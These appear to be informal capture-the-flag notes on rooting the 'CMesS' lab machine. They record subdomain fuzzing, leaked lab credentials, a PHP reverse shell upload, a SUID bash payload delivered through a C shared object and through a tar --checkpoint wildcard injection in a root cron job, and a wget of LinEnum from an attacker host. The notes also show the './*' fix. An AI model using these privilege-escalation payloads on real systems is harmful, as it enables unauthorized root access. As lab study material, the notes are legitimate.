
Challenge Machine (CMesS)

can’t find an easy or quick SQL injection.

directory busting?

found an admin page, but no way to log in or create an account.

subdomain? (needs an /etc/hosts entry so the Host header resolves)

wfuzz -c -f sub-fighter -w top5000.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290

we found dev.cmess.thm

to make sure we can access it, we also have to add the subdomain to /etc/hosts (same IP as cmess.thm)

once we access it, we get this login:

andre@cmess.thm : KPFTN_f2yxe%

we get access to the admin panel and can manage files. Can we upload a PHP reverse shell?

uploaded it, but didn’t see it where expected.

create the file instead?

can’t access it.

it uploaded into assets/.

NOT WORKING

make sure the copy-and-paste spacing of the shell is correct by recopying it from the source.

look for privesc vectors:

sudo -l                                        # anything runnable as root?
find / -type f -perm -04000 -ls 2>/dev/null    # SUID binaries

result:

793613     12 -rwsr-xr-x   1 root     root        10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
783398     40 -rwsr-xr-x   1 root     root        40432 May 16  2017 /usr/bin/chsh
783459     76 -rwsr-xr-x   1 root     root        75304 May 16  2017 /usr/bin/gpasswd
783525     40 -rwsr-xr-x   1 root     root        39904 May 16  2017 /usr/bin/newgrp
783536     56 -rwsr-xr-x   1 root     root        54256 May 16  2017 /usr/bin/passwd
783396     52 -rwsr-xr-x   1 root     root        49584 May 16  2017 /usr/bin/chfn
783620    136 -rwsr-xr-x   1 root     root       136808 Jul  4  2017 /usr/bin/sudo
783722     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
794343    420 -rwsr-xr-x   1 root     root       428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
790045     44 -rwsr-xr--   1 root     messagebus  42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
134288    140 -rwsr-xr-x   1 root     root       142032 Jan 28  2017 /bin/ntfs-3g
134285     32 -rwsr-xr-x   1 root     root        30800 Jul 12  2016 /bin/fusermount
130621     40 -rwsr-xr-x   1 root     root        40152 May 16  2018 /bin/mount
130636     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
130652     40 -rwsr-xr-x   1 root     root        40128 May 16  2017 /bin/su
130635     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
130670     28 -rwsr-xr-x   1 root     root        27608 May 16  2018 /bin/umount

next, strace the non-standard SUID binary (vmware-user-suid-wrapper) to see which files it looks for:

strace /usr/bin/vmware-user-suid-wrapper 2>&1 | grep -i -E "open|access|no such file"

result:

access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
vmware-user: could not open /proc/fs/vmblock/dev

can we create /etc/suid-debug? (only if /etc is writable by us, which it normally isn’t, so this is probably a dead end)

__________________________________________________________________________________________________________

this might take too much time. Check crons first:

cat /etc/crontab

result:

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

we can abuse tar checkpoint actions (wildcard injection)!

the cron runs tar with a bare *, so the shell expands every filename in the directory into tar’s argument list. A file named --checkpoint=1 is parsed by tar as the option --checkpoint=1, and tar then runs whatever --checkpoint-action=exec= names, as root.

make the payload script. It must live in /home/andre/backup, because tar runs from there and the action is just "sh runme.sh":

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh

give it perms (not strictly needed since it is run with sh, but harmless):

chmod +x /home/andre/backup/runme.sh

exploit:

format (what we want tar to end up running):

tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=<command> <files>

what the cron actually runs:

cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

it cd’s into the backup folder first, so the option-named files have to be created there, because that is where * is expanded:

touch /home/andre/backup/--checkpoint=1
touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh

We can come back to this later; right now we can’t create files in andre’s home directory with the current shell.

now we check (the cron fires every 2 minutes) until /tmp/bash is created:

ls -la /tmp

once it is, run it with -p so bash keeps the SUID root privileges:

/tmp/bash -p

we have root!
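Added example, not part of the original notes: a scratch-directory reproduction of the tar --checkpoint wildcard injection that runs as the current unprivileged user, so the mechanism can be checked before waiting on the real cron. The temp directory and archive name stand in for /home/andre/backup and /tmp/andre_backup.tar.gz; the payload only drops a marker file instead of copying a SUID bash. It also shows the one-character fix for the cron line (./* instead of *), which is what you would recommend in the report.

```shell
#!/bin/sh
# Added example (not from the original notes): reproduce the tar
# --checkpoint wildcard injection in a scratch directory as the current
# user, so the mechanism can be verified before waiting on the two-minute cron.
#
# Why it works: the cron line is
#     cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
# The bare * is expanded by the shell, so every filename in the directory
# lands in tar's argv. GNU tar accepts options anywhere on the command line,
# so a file NAMED "--checkpoint-action=exec=sh runme.sh" is parsed as that
# option, and tar runs the command with its own privileges (root, for cron).

# Create a payload directory (stand-in for /home/andre/backup), print its path.
tar_wildcard_setup() {
    dir=$(mktemp -d)
    # Real payload would be: cp /bin/bash /tmp/bash; chmod +s /tmp/bash
    # Here it only drops a marker file; tar's cwd is the payload dir.
    printf 'touch pwned\n' > "$dir/runme.sh"
    touch "$dir/--checkpoint=1"
    touch "$dir/--checkpoint-action=exec=sh runme.sh"
    echo 'something legitimate to back up' > "$dir/data.txt"   # constructed sample
    echo "$dir"
}

# Run the cron job's command verbatim against DIR.
# Prints "injected" if the checkpoint action fired, "clean" otherwise.
tar_wildcard_run() {
    dir=$1
    archive=$(mktemp -u).tar.gz           # stand-in for /tmp/andre_backup.tar.gz
    ( cd "$dir" && tar -zcf "$archive" * ) >/dev/null 2>&1 || true
    rm -f "$archive"
    if [ -e "$dir/pwned" ]; then echo injected; else echo clean; fi
}

# The fix for the cron job: anchor the glob with ./ (or put -- before it),
# so tar sees "./--checkpoint=1" as a path, never as an option.
tar_wildcard_run_fixed() {
    dir=$1
    archive=$(mktemp -u).tar.gz
    ( cd "$dir" && tar -zcf "$archive" ./* ) >/dev/null 2>&1 || true
    rm -f "$archive"
    if [ -e "$dir/pwned" ]; then echo injected; else echo clean; fi
}

# Stand-alone demo.
vuln_dir=$(tar_wildcard_setup)
echo "vulnerable cron: $(tar_wildcard_run "$vuln_dir")"
safe_dir=$(tar_wildcard_setup)
echo "fixed cron:      $(tar_wildcard_run_fixed "$safe_dir")"
```

This needs GNU tar (the --checkpoint options are a GNU extension, which is exactly why the trick works on Linux boxes). If the real box only gives you a shell in which you cannot write to /home/andre/backup, nothing here changes: the option files must sit in the directory the cron cd’s into.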

__________________________________________________________________________________________________________

capabilities?

getcap -r / 2>/dev/null

result:

/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep

__________________________________________________________________________________________________________

back to shared object injection:

the idea (from the standard Linux privesc template) is to build a shared object whose constructor runs as soon as a SUID binary loads it:

#include <stdio.h>
#include <stdlib.h>

/* constructor attribute: runs automatically when the .so is loaded */
static void inject() __attribute__((constructor));

void inject() {
	/* drop a SUID copy of bash and launch it with privileges preserved */
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

the file the wrapper looks for, from the strace output:

access("/etc/suid-debug", F_OK)

steps tried:

cd /home/tmp/
nano suid-debug.c
ctrl+x
y
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

(the gcc line is still the template’s libcalc paths and was never adapted to suid-debug.c. More importantly, the strace output only shows an access() existence check on /etc/suid-debug, not a library being loaded from a user-writable path, so there is nothing for a shared object to hook into here.)

didn’t work. Try LinPEAS or LinEnum?

host the files on the attacker box first:

python3 -m http.server 8920

then transfer them on the target:

wget http://10.6.62.12:8920/LinEnum.sh

what are the .bak files LinEnum turned up?

cat /opt/.password.bak

we get the ssh password for user andre:

ssh andre@10.10.234.116
UQfsdCB7aAP6

now, as andre, we can write to /home/andre/backup and go back to the tar checkpoint trick (see above)!